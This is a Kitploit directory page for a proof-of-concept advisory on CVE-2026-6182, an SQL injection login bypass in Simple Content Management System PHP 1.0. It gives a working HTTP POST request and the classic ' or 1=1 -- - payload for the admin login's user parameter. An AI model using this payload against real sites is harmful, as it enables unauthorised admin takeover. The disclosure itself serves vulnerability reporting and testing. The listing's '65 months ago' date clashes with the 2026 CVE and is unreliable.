Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-6182-SQLI-auth — Proof-of-concept for SQL injection authentication bypass in Simple Content Management System PHP, allowing unauthenticated attackers to gain admin access via crafted user parameter. | Kitploit
Tools/GitHubGitHub/xmyronn/cve-2026-6182-sqli-auth
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthentication
GitHubxmyronn/cve-2026-6182-sqli-auth

CVE-2026-6182-SQLI-auth

Proof-of-concept for SQL injection authentication bypass in Simple Content Management System PHP, allowing unauthenticated attackers to gain admin access via crafted user parameter.

View Repository
65 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

SQL Injection Authentication Bypass - Simple Content Management System PHP

Description

A SQL Injection vulnerability exists in the admin login page of Simple Content Management System PHP. The user parameter is not sanitized before being passed to the SQL query, allowing an unauthenticated attacker to bypass authentication and gain full admin access.


Vulnerability Details

  • Type: SQL Injection (CWE-89)
  • Impact: Authentication Bypass we get full admin access
  • Affected File: /web/admin/login.php
  • Affected Parameter: user
  • Attack Vector: Remote, Unauthenticated **Severity: Critical

Vendor

code-projects.org

Product

Simple Content Management System PHP

Version

1.0


Proof of Concept (PoC)

Step 1 - Send the following request in burp:

root@kitploit:~
POST /web/admin/login.php HTTP/1.1
Host: [target]
Content-Type: application/x-www-form-urlencoded

user=test'+or+1%3D1+--+-&password=test&submit=Login

or just add this in the login page Screenshot 2026-04-05 051755

Step 2 - Login form with payload:

test' or 1=1 -- -

Step 3 - Admin panel access granted:

Screenshot 2026-04-05 054510

Impact

An unauthenticated remote attacker can bypass the admin login completely without knowing any credentials, gaining full control over the admin panel including adding content.


Author

Imad Alvi


Reference

https://code-projects.org/simple-content-management-system-in-php-with-source-code/

Download Tool